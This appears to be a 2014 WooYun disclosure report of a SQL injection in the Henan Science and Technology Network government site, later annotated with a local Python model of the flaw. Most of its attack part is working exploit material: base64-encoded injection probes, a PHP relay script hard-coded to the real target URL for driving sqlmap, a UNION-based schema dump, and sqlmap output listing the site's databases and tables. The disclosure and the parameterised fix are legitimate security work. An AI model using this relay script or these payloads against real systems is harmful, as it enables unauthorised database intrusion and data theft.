
Vulnerability Summary

Defect ID: wooyun-2014-070259

Title: SQL injection in 河南科技网 (Henan Science and Technology Network)

Affected vendor: 河南科技网 (Henan Science and Technology Network)

Author: 浮萍

Submitted: 2014-07-30 11:08

Fix deadline: 2014-09-13 11:10

Public disclosure: 2014-09-13 11:10

Vulnerability type: SQL injection

Severity (self-assessed): High

Self-assessed Rank: 12

Status: handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2014-07-30: details sent to the vendor, awaiting vendor handling
2014-08-04: vendor confirmed; details visible to the vendor only
2014-08-14: details opened to core white hats and relevant domain experts
2014-08-24: details opened to regular white hats
2014-09-03: details opened to intern white hats
2014-09-13: details opened to the public

Brief description:

Detailed description:

Henan Science and Technology Network: http://www.hnkjt.gov.cn/

[screenshot: Snap9.jpg]

[screenshot: Snap10.jpg]

The article page takes a parameter dataId=MzQxNw==, which base64-decodes to 3417.
Base64-encoding 3417' gives MzQxNyc=; with that value the page renders abnormally.

[screenshot: Snap11.jpg]

Base64-encoding 3417 and 1=1 gives MzQxNyBhbmQgMT0x; with that value the page renders normally. The server therefore decodes dataId and splices the result into the query unquoted; the base64 wrapper is only an encoding step, not a filter, and an attacker simply encodes each payload before sending it. (A 3417 and 1=2 probe that renders differently from the baseline would complete the boolean test.)

[screenshot: Snap12.jpg]

Finding the columns (爆字段):

[screenshot: Snap13.jpg]

Dumping database information:

[screenshot: Snap14.jpg]

Dumping the database list (暴库):

[screenshot: Snap15.jpg]

Enumerating tables this way did not work,
so the injection was driven through a relay script instead.
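To make the mechanism above concrete, here is an added example (not code from the original report, and not the target site's code) that models the flaw locally: a base64 `dataId` is decoded and concatenated into SQL, a SQLite in-memory database stands in for the target's MySQL backend, and a parameterised version shows the fix. The table name `content`, the column `data_id` and the two rows are assumptions constructed for the demo; the real schema on hnkjt.gov.cn is unknown. It also carries the author's manual probe one step further with the `and 1=2` branch, and shows a UNION-based schema dump through the same hole.

```python
"""Added example (not code from the original WooYun report or the target site).

Models the flaw described above: dataId is base64, the server decodes it and
concatenates the result into SQL. A local SQLite database stands in for the
target's MySQL backend; table/column names and rows are constructed assumptions.
"""
import base64
import sqlite3
from typing import Callable, List, Optional

# Assumed schema: the real table and column names on hnkjt.gov.cn are unknown.
SCHEMA = "CREATE TABLE content (data_id INTEGER PRIMARY KEY, title TEXT)"
ROWS = [(3417, "constructed row 3417"), (3418, "constructed row 3418")]


def wrap(payload: str) -> str:
    """Encode a raw dataId the way the site expects it (plain base64)."""
    return base64.b64encode(payload.encode()).decode()


def unwrap(data_id: str) -> str:
    """What the server does on receipt: decode and treat the result as text."""
    return base64.b64decode(data_id).decode(errors="replace")


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO content VALUES (?, ?)", ROWS)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, data_id: str) -> Optional[List[str]]:
    """The bug: the decoded value is spliced into the statement with no quoting
    or cast. A SQL error (the 3417' probe) returns None, i.e. the 'abnormal page'."""
    sql = "SELECT title FROM content WHERE data_id=" + unwrap(data_id)
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error:
        return None


def hardened_lookup(conn: sqlite3.Connection, data_id: str) -> List[str]:
    """The fix: validate the decoded value as an integer and bind it as a parameter."""
    raw = unwrap(data_id)
    if not raw.isdigit():
        return []  # anything that is not a plain id never reaches SQL
    return [row[0] for row in
            conn.execute("SELECT title FROM content WHERE data_id=?", (int(raw),))]


def boolean_probe(lookup: Callable, conn: sqlite3.Connection, base_id: str = "3417") -> bool:
    """The author's manual test, completed with a false branch: the endpoint is
    injectable if 'and 1=1' behaves like the plain id and 'and 1=2' does not."""
    baseline = lookup(conn, wrap(base_id))
    true_case = lookup(conn, wrap(base_id + " and 1=1"))
    false_case = lookup(conn, wrap(base_id + " and 1=2"))
    return baseline == true_case and baseline != false_case


def union_dump_tables(conn: sqlite3.Connection) -> Optional[List[str]]:
    """Schema enumeration through the same hole. MySQL would read
    information_schema.tables; SQLite keeps its catalogue in sqlite_master."""
    payload = "-1 union select group_concat(name) from sqlite_master"
    return vulnerable_lookup(conn, wrap(payload))


if __name__ == "__main__":
    db = make_db()
    print("dataId for 3417:", wrap("3417"))                       # MzQxNw==
    print("vulnerable endpoint injectable:", boolean_probe(vulnerable_lookup, db))
    print("hardened endpoint injectable:  ", boolean_probe(hardened_lookup, db))
    print("tables via UNION:", union_dump_tables(db))
```

The three `wrap()` values reproduce the encodings quoted in the report exactly (MzQxNw==, MzQxNyc=, MzQxNyBhbmQgMT0x), which is a useful sanity check before pointing any tooling at a real endpoint.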

Proof of vulnerability:

<?php
// Relay script: the target expects dataId to be base64-encoded, so sqlmap
// cannot inject into it directly. This script takes a plain id from its own
// query string, base64-encodes it, forwards the request to the target and
// returns the target's response body unchanged so sqlmap can analyse it.
header("Content-type: text/html; charset=gb2312");
set_time_limit(0);
$id = isset($_GET["id"]) ? $_GET["id"] : "";
// URL-encode the base64 output: '+', '/' and '=' would otherwise be
// mangled in the forwarded query string and break decoding on the target.
$id = urlencode(base64_encode($id));
$url = "http://www.hnkjt.gov.cn/new/allListDetail.eiip?cid=1&dataId=" . $id;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
?>


Visit http://host/xx.php?id=3417 and feed that URL to sqlmap. (sqlmap's bundled tamper script base64encode.py applies the same encoding to each payload and would remove the need for a relay.)
System information (note that the operating-system and web-technology lines are taken from the HTTP headers of the host serving xx.php, i.e. the relay, so they do not describe www.hnkjt.gov.cn; only the back-end DBMS fingerprint is inferred from the target's responses):

web server operating system: Windows
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.11


Databases:

available databases [5]:
[*] cxqybak
[*] hnkjwdb_old
[*] hnsti_cn_db
[*] information_schema
[*] mysql


These match the databases dumped manually above.

Database: cxqybak
[188 tables]
+----------------+
| base_content |
| epdbconinfo |
| epdbfieldinfo |
| epdbfieldtype |
| epdbmoduleinfo |
| epdbphy1 |
| epdbphy10 |
| epdbphy100 |
| epdbphy101 |
| epdbphy102 |
| epdbphy103 |
| epdbphy106 |
| epdbphy107 |
| epdbphy108 |
| epdbphy109 |
| epdbphy11 |
| epdbphy110 |
| epdbphy111 |
| epdbphy112 |
| epdbphy113 |
| epdbphy120 |
| epdbphy121 |
| epdbphy122 |
| epdbphy123 |
| epdbphy124 |
| epdbphy125 |
| epdbphy126 |
| epdbphy127 |
| epdbphy13 |
| epdbphy137 |
| epdbphy138 |
| epdbphy14 |
| epdbphy140 |
| epdbphy141 |
| epdbphy142 |
| epdbphy143 |
| epdbphy144 |
| epdbphy145 |
| epdbphy146 |
| epdbphy147 |
| epdbphy148 |
| epdbphy149 |
| epdbphy15 |
| epdbphy150 |
| epdbphy151 |
| epdbphy152 |
| epdbphy153 |
| epdbphy154 |
| epdbphy155 |
| epdbphy156 |
| epdbphy157 |
| epdbphy158 |
| epdbphy159 |
| epdbphy16 |
| epdbphy160 |
| epdbphy161 |
| epdbphy162 |
| epdbphy163 |
| epdbphy164 |
| epdbphy165 |
| epdbphy166 |
| epdbphy167 |
| epdbphy168 |
| epdbphy169 |
| epdbphy17 |
| epdbphy170 |
| epdbphy171 |
| epdbphy172 |
| epdbphy173 |
| epdbphy174 |
| epdbphy175 |
| epdbphy176 |
| epdbphy18 |
| epdbphy186 |
| epdbphy187 |
| epdbphy188 |
| epdbphy189 |
| epdbphy19 |
| epdbphy191 |
| epdbphy192 |
| epdbphy193 |
| epdbphy194 |
| epdbphy196 |
| epdbphy197 |
| epdbphy198 |
| epdbphy199 |
| epdbphy2 |
| epdbphy20 |
| epdbphy200 |
| epdbphy201 |
| epdbphy202 |
| epdbphy205 |
| epdbphy206 |
| epdbphy207 |
| epdbphy208 |
| epdbphy209 |
| epdbphy21 |
| epdbphy213 |
| epdbphy216 |
| epdbphy217 |
| epdbphy218 |
| epdbphy219 |
| epdbphy22 |
| epdbphy220 |
| epdbphy221 |
| epdbphy222 |
| epdbphy223 |
| epdbphy224 |
| epdbphy225 |
| epdbphy226 |
| epdbphy227 |
| epdbphy228 |
| epdbphy23 |
| epdbphy24 |
| epdbphy25 |
| epdbphy26 |
| epdbphy27 |
| epdbphy28 |
| epdbphy29 |
| epdbphy3 |
| epdbphy30 |
| epdbphy35 |
| epdbphy36 |
| epdbphy37 |
| epdbphy38 |
| epdbphy39 |
| epdbphy4 |
| epdbphy40 |
| epdbphy41 |
| epdbphy42 |
| epdbphy43 |
| epdbphy44 |
| epdbphy45 |
| epdbphy46 |
| epdbphy47 |
| epdbphy48 |
| epdbphy5 |
| epdbphy50 |
| epdbphy51 |
| epdbphy52 |
| epdbphy53 |
| epdbphy54 |
| epdbphy55 |
| epdbphy56 |
| epdbphy58 |
| epdbphy59 |
| epdbphy60 |
| epdbphy61 |
| epdbphy64 |
| epdbphy66 |
| epdbphy67 |
| epdbphy68 |
| epdbphy69 |
| epdbphy70 |
| epdbphy71 |
| epdbphy72 |
| epdbphy73 |
| epdbphy74 |
| epdbphy75 |
| epdbphy76 |
| epdbphy77 |
| epdbphy78 |
| epdbphy79 |
| epdbphy80 |
| epdbphy81 |
| epdbphy82 |
| epdbphy84 |
| epdbphy85 |
| epdbphy86 |
| epdbphy87 |
| epdbphy88 |
| epdbphy89 |
| epdbphy9 |
| epdbphy90 |
| epdbphy91 |
| epdbphy92 |
| epdbphy93 |
| epdbphy94 |
| epdbphy96 |
| epdbphy97 |
| epdbphy98 |
| epdbphy99 |
| epdbstandright |
| epdbsysinfo |
| ip_0_194 |
| ip_195_217 |
| ip_218_218 |
| ip_219_255 |
+----------------+


Database: hnsti_cn_db
[86 tables]


Database: hnkjwdb_old
[190 tables]


Fix recommendation:

Copyright notice: please credit 浮萍@乌云 (WooYun) when reprinting.


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-08-04 09:49

Vendor reply:

CNVD confirmed and reproduced the described issue; it has been forwarded via CNCERT to the Henan branch center for handling.

Latest status:

None yet